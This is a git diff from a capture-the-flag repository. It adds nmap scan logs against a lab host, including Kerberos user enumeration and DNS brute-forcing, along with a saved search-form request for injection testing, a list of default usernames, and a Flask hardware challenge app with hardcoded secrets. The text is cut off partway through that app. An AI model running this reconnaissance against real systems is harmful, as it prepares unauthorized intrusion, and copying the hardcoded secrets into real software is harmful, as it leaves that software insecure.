zs1P7PfB*pk1PHXgfaw6O-$z#-lAKWP|CKUj119#5)$mixv4}Kpk%a_HS$o!0uU4pi*0o%wAU*;#z0tFFNhz0-l&i?-4{fpA8vNmp=?emxHm4=_YYw)WB!!_Q3 z5E%jSI|3gu%&&j7Gpe!bhWI z9|8nwDIoY*OHFkVAkba{r=5AlpXCCySDy`Tt@#0iJ$xcSfB*pk1PBlyK!5-N0v#zJ z0ML=$>Y@k`AV7cs0RjXF5Fk)Lf!TK~+)*w-{d^lyvtU3Yl%0bB0RjXF5FkK+009C7 z2sBwh0HDbo;PeCt5FkK+009C72oPv5fhVr|*h}RCv{#=EZLMIyP!n4S5FkK+009C7 z2oNAZfI!Cy2mo|km%1PV1PBlyK!5-N0t5)uPvA{o{_@#!0qW=5u$sGidb>pg8piEJ z1PBlyK!5-N0t5&UAV8pb0s;Wdvv+0!1PBZfSiXFD`q|HZmTtT4wjtlyK!5-N0t5&U zXsW>Jo4x3{asis!1+_f6U_dQ3)kS~+0RjXF5FkK+009C7T2w#)phY`Ivj`CAEP)j( zR&>?{xf%il2oNAZV6q7ud(II*l?%{8y*{mjuEnJgAV8p^z`}(K({#t9bKmK@{H*a2g z-t(T9iu2rg=bdT({P}6xv}t)A+i$;pnmc#yKpnB)-~RTue2PGvcg;1|%#UAr<&_8a z@dp6{1PBlyK!5;&u?PqNj77`71PHXHz$KSll9n!Ans(fA$JEu;l@={plwuHH`h@=S z%P&uN-+g!5a?35#GoJB`d~hCv_Xq~;zWeU^b;m$F=I(E^%{F;GQRnTq-=6;X$3Le1 z_uoI?RshAmS6+E#9voP0wbcgBb=hT?<>z_kGoP8(S!bPm`$G>slzMx62L%8k7!d)1 z9d_6uMP1RBi!Z)7?X%B5#VPzIK!5-N0t5&&PT)g3z4d?P0yNIM0cR2nXaKTP5FpSz zfq1I^=%bJ3PtrHsaKnLyl>Qyx|NZZO&j;QyNRJW&^#~kXbkRlWvBw_Evj^hy&O7fs zP)Gc+{`%{uU;p~o`2hb}&wAFtcM)iaf&9Abt~;>p;fEhicinYY9w3OILs2%^V1we% zf!~phu*V*I418W`rIpg9mtLBldg`e`nFj+q_=5le0t5&UAV7e?2m%5CBLMlD0D<-v zm@;KbK6tM^iib=6e|UDQAS`Op0GCYx+BX#0BWt(W5X7`VsufhhOgcV9kj zAO_+wwIBivG1!mKr6rDwtb)=K83<7}+ibJa%@zNSz(Q#$+8ommN~a!_?&EI)1PBly zK!8A<1P)pCtar!-s1t6}s_p9O?G_Pe8ov`0AkZj*$nU@5h8xmNH{F!3x#pTQYu2n3 zkME1e@-bf^%9&@LIiyK3;$OUYalZZj`|nQ|UU*^JVv8;EIRf$6J|5LyaKQ!nyn)h# zWAT9auCzowu^>RPC_(9W<$uQ_2BoD~q#))eCv9dH(;k*It_k0%8@w7;MKQ{JrK~sY_rCn6crqUY`64h-G(P4Q#Nd83rC2N=Rv1(W z5FkK+009C72sBziHbA4rosR&4h6=YAWFQ8Z_`aT zO;=oTMgDHTwbx!dPvwtS1;l~?@h-nOHU{ulUww7HEsl+q1>=Wp^66c9U2x95~ zXjjw`frofqKrBX3v}ZJR*@plD0t5&UAW(mSy*_o;U2*~H@7$a-jP75s&1svn5+Fce z!UBrk3tQ1(h+wZS`{p+aPxyvrQ0OL_}3;_ZJ2oNAZfB*pk z1Ugz^+b`^QfLwr%?&7YV-fj_rj_zU?M}PnU0t5&UAV7cs0Rja21q1-x2?PibAV7cs z0RjXF5Fk(p%>DU$){qNOXms#z!GI3#T$e_G009C72oNAZfB*pk1PTEGfI`A=0t5&U zAV7cs0RjXFOm=}!9Pz`mx8f)Invvu|Kc2DWcN;4bb+yn>^ zAV7cs0RjXF5FkK+K>Y>G38=rZGY}v^fB*pk1PBlyK%j*MK7H2XU2*|hxP$7_G{Jzn zu&R^*0RjXF5FkK+009C72(*@f06=T?ht?1vK!5-N0t5&UAV8p@0;fItr7y|_XefD0 zoJ=sFCAvW)2oNAZfB*pk1PBlyK!8Af1q1-<>#KGG1PBlyK!5-N0t5)Ou)rJs{l1Ol z0<>@k)valQ0d=EQF#!Su2oNAZfB*pk1PBml9RUG=*69l^AwYlt0RjXF5FkK+Ktl!g zc*orb$OUL9dF!04tEabHM4)y0LrVw{AV7cs0RjXF5FkK+K-~lc0P04oVgdvR5FkK+ z009C72(+lcF{>Z9p-tO=^;0K$GB|mH+_) z1PBlyK!5-N0t5&&Qa}Kpk=o8hfB*pk1PBlyK!5;&rU?A)RX4*>!M2oNAZfB*pk1ezjn=970`Di@$B z^sRi-uAbg*5rJ0jA#Ec-fB*pk1PBlyK!5-N0yPp40H_h9Y6uV@K!5-N0t5&UAkbn0 zpIB|byW|42Sf{i~a|8ogr6;t5009C72oNAZfB*pk1PIhoKmeeQxT+>VfB*pk1PBly zK!8Bg1diKq@2lhjG>yO2Pb?VF>OG`=1PBlyK!5-N0t5&UAV8o70s;UvKvV?*0t5&U zAV7cs0RjYCOkn-fe|e!?fEMeNR%(u5Kr8izwh$mdfB*pk1PBlyK!5;&Itd5>)CpF# z1PBlyK!5-N0t5&UXqv!LSDbT(T!5zWx5bIOdV0G>1lppjG?D-T0t5&UAV7cs0RjXF zOiVxkU}AobCP07y0RjXF5FkK+Knn?c{tM5YE*GGMI;3TrA{fxJU87+H2oNAZfB*pk z1PBlyK%jO40sytMR1*OL1PBlyK!5-N0tA{W@a>IXJx?w`Q@fyTPA(YGHeIEm1PBly zK!5-N0t5&UAV6UJ0s;Wzw{s)`0t5&UAV7cs0RjYCNZ_$A9rjGQ04>xZE!`BsfR^qa zjUzyS009C72oNAZfB*pkwGj{isEwmq2oNAZfB*pk1PBly&{Tm#PkQI8AsEm;eWj%Y2oNAZfB*pk1PBlyKw#Vg0s!Ntb07f%1PBlyK!5-N0tA{a z@bC>Myg@EN)4QSl8Xy?Zeto9J1PBlyK!5-N0t5&UAV6Tu0s;VICUXD*0t5&UAV7cs z0RjYCMPTjoPLvDKDxJ|*?GOxTtM1ZR0t5&UAV7cs0RjXF5Fju<0Re#VxjBje0RjXF z5FkK+009Ec7U)|1(Wm4BG`knt_558uz1<=L?b>_VO@IIa0t5&UAV7cs0RjZZARquR z1}wW0AV7cs0RjXF5FkLH6$EEhj*L009C72oNAZfB*pk zqZSYV7&Vn02@oJafB*pk1PBly& z1lqnET>t?B1PBlyK!5-N0t5&U7+F97U}PhE5FkK+009C72oNAZpxFYiT%1;u3()Ld z=%Dip26Rwox)cHg2oNAZfB*pk1PBlyP)$Gppqh;B1PBlyK!5-N0t5&UXcd9gulw02 zceAzsLn>b}w|;`2_z&p;l_GGyLti^`$9OrlhG;r=}S*W~8VqJ}U$W5FkK+009C72y}+PlT0hAJVlZE6KwoL_A5Zpsdwa(v zRxCa^u7e#!fB*pk1PBlyFb;v4uYTejxd7vUbI2$K1OrA1Wj6w?D6o9_@`}x>6by(b z`r};}G%^mxdu+u9+DL!^0RjXF5FkK+K*I$r0p4(OCnQiifl8SGQG2D;{TD4-RQ1FW zFql1ic0S0DwE$uYKzWH^L#2Al_w$(m0RjXF5FkKc;sWJbv0VeLKhG7J{dV0I1 z1PlY@D*~-9Q0Xy!EDjJqr6orA)zSyz9f2#aymJ1o!B}B1-WOP@REs`T+SfJ$1PBly zK!5-N0t8x5Kmefi`b3Kej9Q>t0HC~r;nD#j6`(X=5CMVsDK7#54AV7cs0RjZ- zAh7oN=N~HzFxn=AbnJik)Nd zZykU_!*2ov2oNAZfItHU4!ZNe-^&GPAo%1ym8k)fyZ>E%n+wDf`tiQcuiCVL(rE>y zJeAf9DE;2w1PBlyK!5-N0t5)OwtxUYYxj@V5g1XRT1x+L2gcyP+JHVX2`ZIpnFp2j zwT%D)0t5&UAV6Tu0vo+*^IysZ7&Ds##x2m*)7vc~Fm65v5@-#9$n&o@y06s2*mu^f zS(U!Zw^dqDAW{!R1getxf&c*m1PBlyK!8A72nYbQMK@_Af$9P=IA3|?m8b-2dI=1Fy46wWvBL$009C72oNAZpn|}!|8&EVasev9*i=^m!GOB*s+>S$ z1g1})o`xIbM=K%=V9uO5!!9VWc=6(j4UYO10t5&UAV7cs0RjZtTfplA+PnX>p1^=W zEEEt=?PCxhPxNES|Hu@Gfqx9(a0RjXF5FkK+009C72#iiZ0AO@Z_98%l009C7 z2oNAZfIy7}{xs*v=g0-9F{cjhOn?9Z0t5&UAV7cs0RjYCMnC|dWx7H`2(+%i zlqplvN-O!Fi`MNSEh9jH009C7+D71Qdw${zask?=yE?j|T|K?sRtxOtE_QJQ#xD?2 zfLXIAN+K701;)Ya8BWV;On2oNAZfB*pk1PHX3fEmB-)n8gmpe_QD zQLysLE2kLjmzRYL7v>oQ<=cHGK!5-N0t5&U7`?zo-`Vsrxd5a0vS~4;zvp`o*Z?}j*osm^f zpxp$jjr_e?q}_T_dkGLAK!5-N0t5&Q77zd!?BNrENiDEq#fpmW3=9+jfJuF8xOf5t z2oNAZU_1h+9QpP86+Rruu z1PBlyK!5-N0t8x9KmedM`$ek=j7nhf;>A^;-jAw+Y^NCfSDOM*T898YsfND^5FkK+ z009Cc3Y@aqPW#9O7?H^i%@Pm{XqLS55~zVdJh^YwGXB%1`Jam#beSp$5FkK+009C7 z2sBN=+5k`V54Wa1-2oNAZfB*pk1cniqlD#;*ZkxcU9XS}FbO)kLoU(U03FhiE`va=1ePvcI;5&tFQ67{ z5Dcl<1_A^K5FkK+009C78YUnB&@gHzB2asQ-rn96KcyuW`CEPU)k`;x>F)Niv` zRt!2O-Wm|E4O9paAV7cs0RjZ73H;&(7yVf-Ks6oPTTq~@r?=bufEMf+O(M`tfp`T$ zd0Db#N%- zD@~m`wGD+dnE(L-1PBlyK!5;&asdH=auJ^iw2?r(FYt*co*2^N7`TtM#FPK{i2;B7 zG;{jFSle!Y0t5&UAV7dX;{-O|dH#8F0UGD+O!X45^mn~v)k~lO0x@Xs>gr017A+b$ zTMXjI6AT!rz#jw%5FkK+009C72y~=?#Q{6ATV2#-5{SY6N-Oz4<;m3Nu9W}*0t5&U zXr91&XC3?lxd6@ccjg)jboKOh8%ER+R8<6;ArL75v7CQI1&W_$w8J?G5FkK+009C7 z2oPv(0Sg4QcK>J{0RjXF5FkK+009E6ATZ^X`@KUhKr8fwHq=N!Hb9LaRYQOP0RjXF z5FkK+009C7T3J8(PZfB*pk1PHXDz-QKe?i=L-v|-0-@^AwFWj~yb?+CP+Kn(nQdwbK8B}?)^KrNde z?C;Wa*i1E zPoF+L&6qJG|EbGKR7!vV0RjXF5NKI}`Cp%TkX(S4?H&!Auz+B|gb7tZpm_o@Eg;qf zs8-^Ae=DuDQvT|I(u{%F7T-mQI^w(dU0PzF*|TTo$CqyRHvs|!2oNAZfB*pk?I|Dt z(4PIK)dX^Z(m{PGNetfS%$YMV$d7jj#!pe=y??8$vP$tW{~gl`7A{;k@See_`^hJt zOmpYX6$BV0tF8?XoJ9KzVXIC$^~dcPq(*?<_2hQ-)ngT1X96( ze!ssH2$-~)@d!W+{Ns^;qTIW8Z+iuT;=6YO1PBlyK!5-N0tE6E5CF)x@6?>Yt`z=) zWMN^U_&C*j@d&`^LGif3a5x;@3f7 z&@h1*)gPopYCyS&2$V&9CqRGz0RjXF5Fn7Bz`;fe`L$P#2@tq15V`)TQnfZm0str92WmiI-vU*s{}BKv-|a640Ain59w1f9$H#tE z+fv8dPJjRb0t5&U$Wq|bzuA0FE!BZ-hVBF)Rh1M0t5&UAV7csflkLW z0saaIWG)bc|9HqhX7-DLf4|?~e&D~{toSWn>|3oGCopqAk9cd`4t^s*p#B0e^IyE;uKl*%V&LEF^+q@QOn?9Z0t5&UXq3R} zmH#{{7obsHsxcD^2nI|DWj6v%6Nohe;}yYy$P$PW0f1O%FdiX@#|_GJ4m8a`dk7F9 zK!5-N0t5)ONk9OgO}(wH1PBlyK!5-N0t5(*2weTtuiq^fUphcansRRfR zAV7cs0RjXF5FpTA0Re#a_Pv%9AV7cs0RjXF5NNf)Lr?wd{>;h`cP?Hyf4S8V8sAQV z-pXKk{M_R0bkS-8trnKk_!Y0D1SJ z+8n}cfO)fxYou;~nFCZ9j_@>TCAZvlt8~}Ik-p#sQDo=m_ z0RjXF5FkLH?E(S-ZT}0>30z5=agDx3;!2YK5v2AV7cs0RjXF5Fk(%5CABP_)eh30-Kwgo#AlUVgXGjK!5-N z0t6Z^@Y1VaxF8px;hn5`6AJWJ2FunCoDj=y1WsCDb#--D6{>FE$F2LSeRmyP+7Pn= zMnoW0QWFQH_P3n?0RjXF5FkK+0D*c52msWpKh%amQec`j`=;49dBM^T0stitUkMN( zK!5;&tOS1d&F_9zE0t5&UAV7cs0RnXvn7KcZm_@+q+(YU{;QsOo)-ate!t(Dot-T%>zx1r0t5&UAV7csfs6$N05a}8RVNTx0XJ^k*aZ;-_i0Pq z`Hxo&_~Uhwj~`51cl#3{K!5-N0tC_mAHQ_%=W+qkK7MJfKyPKRZ2s@ocE5%~91eGy6C?TkL}8G2oNAZfB*pkwGw#cM<04pEAl2oNAZ zfB*pk1PBlyK;TFO1OSeN)kz5uAV7cs0RjXF5I8}B-~ZvGKamS?f*s(}^%t;GK>hnj z4GDB&jlftH;IPWQd-pnZx7)R5;9(&<4*>!M2oNAZfB=D-2?zkx ztV2|XK$XC)Temt}TU(ulg@x^<0r$HyKn(hC-@d&)_^-N7Y>Oa3Og4C!0f*GJY$rf~ z009C72poyP^+&#XNiM*V&^l>@1bQojWwQk~s6#cSnF4q2-07^Yu0GJX7`69$z3tKa z13!%UG8hax@tU+mR3NUQ5FkK+009C72oNC93;`1aG@~E2qQL?Y04SG@jg4JFf$~11 z-=`h?$FY$*FipT<^m;xMAV7cs0RjY0M&QL4uAh+$a5DC;nwx-NKyE#zzO537X98m2 zUsd8+fl12x`ue^H^$`q6U4N2m+lK%F0t5&UAV7csf%*st0Mw^1)P%q;fq0-lf&f)z zety1c^8?#rCcwC>e~_}awsw%i9ZP@!0RjXF5I8o0%YVP}H@N`E#_d9x3kU{e-hry$ zY=H;{RF#-5aBgnz$vz_xkP0SLowsUR1QeMI}sP~W~$ zGXlwJ{bO>#y-KVxxYxiv0txY0L1Y%hnt`bjj}#~b2oNAZfB=Dd3;d%0*8BfOdbo4( z!uiYfuBqA)sDr@Xw-f77OLZX7Qh~S=UsWc}1gJW;*cPh*#A*OViL8NGqp&Iip=w)k zoOc2Q2oNAZfB*pk1o9A&4Uk7asbxzAQmOp2v$JDGV!%FbQop$SKRWo2lSMYb>C>kx z&l~lK>;i=V0RjXF5Fk)jfiJ!JU2l;KP}km3uUZQ9RtC!=0=4WKl_KyzfmB3bTrPhc zId09rIJO)OD7?o_JRl-aD0wG9fB*pk1PBlykf(qEK%V`k)&!CQd!+-!vj8#BPnA@< zLF)O0)OlmAj0vrpqi!@6hJtAmUJGF*DmIA4}{^Rb2pxq00RjXF5U7>F)sOx8eR2V6)g>yEkAPr6K7FO8 zEfnZ>yW0c!RJwiy0aADGN4eq=gN22K(M^?~$DJ?rm_p@=Y$QN{009C72oNAZpmqWt z2dG__s1SkI1mX_-Bm?)?j;Q_=O9M`FH$NUTNR`wI0;&CNCqRGz0RjXF9I?Q^hu`{@ zT!14+cKYTD%q%=R{ECP`b30he8X^#R{Rg=n9}$K5`T2=7Vv>QX648W%)S>E}whC*t=?z1ZM6}L%!9d25Ad{wg|); zf5r6vF<_5Z1OVcF+7jnlTU)C + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + +cpe:/a:microsoft:internet_information_services:10.0cpe:/o:microsoft:windows + + + + + + + + + + + + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_nmap.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_nmap.txt new file mode 100644 index 00000000..787dc686 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_nmap.txt @@ -0,0 +1,27 @@ +# Nmap 7.93 scan initiated Sat Oct 28 14:53:13 2023 as: nmap -vv --reason -Pn -T4 -sU -sV -p 53 "--script=banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/xml/udp_53_dns_nmap.xml 10.129.243.131 +Nmap scan report for megacorp.htb (10.129.243.131) +Host is up, received user-set (0.065s latency). +Scanned at 2023-10-28 14:53:15 CEST for 36s + +PORT STATE SERVICE REASON VERSION +53/udp open domain udp-response ttl 127 (generic dns response: SERVFAIL) +| fingerprint-strings: +| NBTStat: +|_ CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +|_dns-cache-snoop: 0 of 100 tested domains are cached. +| dns-nsec-enum: +|_ No NSEC records found +| dns-nsec3-enum: +|_ DNSSEC NSEC3 not supported +1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : +SF-Port53-UDP:V=7.93%I=7%D=10/28%Time=653D044F%P=x86_64-pc-linux-gnu%r(NBT +SF:Stat,32,"\x80\xf0\x80\x82\0\x01\0\0\0\0\0\0\x20CKAAAAAAAAAAAAAAAAAAAAAA +SF:AAAAAAAA\0\0!\0\x01"); + +Host script results: +| dns-brute: +|_ DNS Brute-force hostnames: No results. + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 14:53:51 2023 -- 1 IP address (1 host up) scanned in 37.94 seconds diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_reverse-lookup.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_reverse-lookup.txt new file mode 100644 index 00000000..f4665c79 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_reverse-lookup.txt @@ -0,0 +1,19 @@ +;; communications error to 10.129.243.131#53: timed out + +; <<>> DiG 9.18.11-2-Debian <<>> -p 53 -x 10.129.243.131 @10.129.243.131 +;; global options: +cmd +;; Got answer: +;; ->>HEADER<<- opcode: QUERY, status: SERVFAIL, id: 35295 +;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1 + +;; OPT PSEUDOSECTION: +; EDNS: version: 0, flags:; udp: 4000 +;; QUESTION SECTION: +;131.243.129.10.in-addr.arpa. IN PTR + +;; Query time: 4543 msec +;; SERVER: 10.129.243.131#53(10.129.243.131) (UDP) +;; WHEN: Sat Oct 28 14:53:23 CEST 2023 +;; MSG SIZE rcvd: 56 + + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_zone-transfer-domain.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_zone-transfer-domain.txt new file mode 100644 index 00000000..a1f9cc44 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_zone-transfer-domain.txt @@ -0,0 +1,6 @@ + +; <<>> DiG 9.18.11-2-Debian <<>> AXFR -p 53 @10.129.243.131 megacorp.htb +; (1 server found) +;; global options: +cmd +; Transfer failed. + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_zone-transfer.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_zone-transfer.txt new file mode 100644 index 00000000..76501b7e --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_zone-transfer.txt @@ -0,0 +1,11 @@ +;; communications error to 10.129.243.131#53: timed out + +; <<>> DiG 9.18.11-2-Debian <<>> AXFR -p 53 @10.129.243.131 +; (1 server found) +;; global options: +cmd +;; Query time: 4127 msec +;; SERVER: 10.129.243.131#53(10.129.243.131) (UDP) +;; WHEN: Sat Oct 28 14:53:23 CEST 2023 +;; MSG SIZE rcvd: 28 + + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dnsrecon_default.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dnsrecon_default.txt new file mode 100644 index 00000000..9fef9243 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dnsrecon_default.txt @@ -0,0 +1,3 @@ +[*] std: Performing General Enumeration against: megacorp.htb... +[-] Could not resolve domain: megacorp.htb + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_megacorp.htb_subdomains_subdomains-top1million-110000.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_megacorp.htb_subdomains_subdomains-top1million-110000.txt new file mode 100644 index 00000000..e69de29b diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/xml/udp_53_dns_nmap.xml b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/xml/udp_53_dns_nmap.xml new file mode 100644 index 00000000..d0a60aca --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/xml/udp_53_dns_nmap.xml @@ -0,0 +1,45 @@ + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + + + + + + + + + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp88/udp_88_kerberos_nmap.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp88/udp_88_kerberos_nmap.txt new file mode 100644 index 00000000..99e51cb0 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp88/udp_88_kerberos_nmap.txt @@ -0,0 +1,12 @@ +# Nmap 7.93 scan initiated Sat Oct 28 14:53:13 2023 as: nmap -vv --reason -Pn -T4 -sU -sV -p 88 --script=banner,krb5-enum-users --script-args krb5-enum-users.realm=megacorp.htb,userdb=/usr/share/seclists/Usernames/top-usernames-shortlist.txt -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp88/udp_88_kerberos_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp88/xml/udp_88_kerberos_nmap.xml 10.129.243.131 +Nmap scan report for megacorp.htb (10.129.243.131) +Host is up, received user-set. +Scanned at 2023-10-28 14:53:15 CEST for 6s + +PORT STATE SERVICE REASON VERSION +88/udp open kerberos-sec udp-response Microsoft Windows Kerberos (server time: 2023-10-28 12:53:21Z) +Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 14:53:21 2023 -- 1 IP address (1 host up) scanned in 7.62 seconds diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp88/xml/udp_88_kerberos_nmap.xml b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp88/xml/udp_88_kerberos_nmap.xml new file mode 100644 index 00000000..9bbdef4f --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp88/xml/udp_88_kerberos_nmap.xml @@ -0,0 +1,35 @@ + + + + + + + + + + + + + + + + + + + + + +
+ + + +cpe:/a:microsoft:kerberoscpe:/o:microsoft:windows + + + + + + + + + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml new file mode 100644 index 00000000..c796df89 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml @@ -0,0 +1,103 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + +cpe:/a:jh_software:simple_dns_pluscpe:/o:microsoft:windows +cpe:/a:microsoft:internet_information_services:10.0cpe:/o:microsoft:windows +cpe:/a:microsoft:kerberoscpe:/o:microsoft:windows +cpe:/o:microsoft:windows +cpe:/o:microsoft:windows +cpe:/o:microsoft:windows + + +cpe:/o:microsoft:windows + +cpe:/o:microsoft:windows + +cpe:/o:microsoft:windows +cpe:/o:microsoft:windows +cpe:/o:microsoft:windows +cpe:/o:microsoft:windows +cpe:/o:microsoft:windows +cpe:/o:microsoft:windows + + + + + + + + + + + + + + + + + + + + + + + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml new file mode 100644 index 00000000..2ccbe517 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml @@ -0,0 +1,92 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + + +cpe:/a:microsoft:internet_information_services:10.0cpe:/o:microsoft:windows +cpe:/a:microsoft:kerberoscpe:/o:microsoft:windows +cpe:/o:microsoft:windows +cpe:/o:microsoft:windows +cpe:/o:microsoft:windows + + +cpe:/o:microsoft:windows + +cpe:/o:microsoft:windows + + + + + + + + + + +cpe:/a:microsoft:kerberoscpe:/o:microsoft:windows + + + + + + + + + + + + + + + + + + + + diff --git a/LaokoonHaxorcist/fullpwn/search.req b/LaokoonHaxorcist/fullpwn/search.req new file mode 100644 index 00000000..616e57a9 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/search.req @@ -0,0 +1,13 @@ +POST /search.php HTTP/1.1 +Host: 10.129.243.131 +Content-Length: 9 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 +Content-Type: application/x-www-form-urlencoded;charset=UTF-8 +Accept: */* +Origin: http://10.129.243.131 +Referer: http://10.129.243.131/ +Accept-Encoding: gzip, deflate +Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7 +Connection: close + +query=abc \ No newline at end of file diff --git a/LaokoonHaxorcist/fullpwn/users.txt b/LaokoonHaxorcist/fullpwn/users.txt new file mode 100644 index 00000000..db28c087 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/users.txt @@ -0,0 +1,3 @@ +Administrator +Admin +Guest diff --git a/LaokoonHaxorcist/hw_invasion/hw_invasion/Dockerfile b/LaokoonHaxorcist/hw_invasion/hw_invasion/Dockerfile new file mode 100644 index 00000000..a13dc719 --- /dev/null +++ b/LaokoonHaxorcist/hw_invasion/hw_invasion/Dockerfile @@ -0,0 +1,21 @@ +FROM ubuntu:latest + +RUN apt-get update --fix-missing && apt-get -y upgrade +RUN apt-get install -y python3 python3-pip supervisor +RUN pip3 install flask flask_httpauth umodbus + +# Setup app +RUN mkdir -p /app + +# Copy challenge +COPY challenge/ /app + +# Setup supervisor +COPY config/supervisord.conf /etc/supervisord.conf + +# Expose the port the challenge is reachable on +EXPOSE 80 502 + +# Run supervisord +CMD ["/usr/bin/supervisord", "-c", "/etc/supervisord.conf"] + diff --git a/LaokoonHaxorcist/hw_invasion/hw_invasion/build_docker.sh b/LaokoonHaxorcist/hw_invasion/hw_invasion/build_docker.sh new file mode 100755 index 00000000..00526627 --- /dev/null +++ b/LaokoonHaxorcist/hw_invasion/hw_invasion/build_docker.sh @@ -0,0 +1,4 @@ +#!/bin/bash +docker rm -f invasion +docker build --tag=invasion . && \ +docker run -p 80:80 -p 502:502 --rm --name=invasion invasion diff --git a/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/app.py b/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/app.py new file mode 100644 index 00000000..7a9bdc37 --- /dev/null +++ b/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/app.py @@ -0,0 +1,104 @@ +from flask import * +from os import path +import random +from flask_httpauth import HTTPBasicAuth +from werkzeug.security import generate_password_hash, check_password_hash + +app = Flask(__name__) +app.secret_key = '45de23-dc231-54569-342da' +SCRIPT_TEMPLATE = """ + +""" + +HTML_TEMPLATE = """ +


+PassCode: + +
+""" +def sess_init(): + session['granted']=False + +auth = HTTPBasicAuth() +users = { + "admin": generate_password_hash("") +} + +@auth.verify_password +def verify_password(username, password): + if username in users and \ + check_password_hash(users.get(username), password): + return username + +@app.route("/") +@auth.login_required +def index(): + if not session: + sess_init() + return render_template('index.html',tmpl=SCRIPT_TEMPLATE%('0000000000')) + +@app.route("/access",methods=["GET","POST"]) +@auth.login_required +def access(): + if request.method == 'POST': + serial = request.values.get('unlock_code') + if serial=='44219054768211203764': + session['granted']=True + return render_template('index.html',tmpl=SCRIPT_TEMPLATE%('ENABLED')) + else: + return render_template('index.html',tmpl=SCRIPT_TEMPLATE%('FAILED'),fm=HTML_TEMPLATE) + else: + if path.exists('/app/.conf') and not path.exists('/app/.provision'): + return render_template('index.html',tmpl=SCRIPT_TEMPLATE%('ENROLL_ERR')) + if path.exists('/app/.conf') and path.exists('/app/.provision'): + return render_template('index.html',tmpl=SCRIPT_TEMPLATE%('AUTH_ERR'),fm=HTML_TEMPLATE) + else: + return render_template('index.html',tmpl=SCRIPT_TEMPLATE%('DEVICES_OFF')) + +@app.route("/provision") +@auth.login_required +def provision(): + if path.exists('/app/.conf'): + open('/app/.provision','w').write('') + return render_template('index.html',tmpl=SCRIPT_TEMPLATE%('SUCCESS')) + else: + return render_template('index.html',tmpl=SCRIPT_TEMPLATE%('DEVICES_OFF')) + +@app.route("/state") +@auth.login_required +def status(): + if path.exists('/app/.conf'): + return 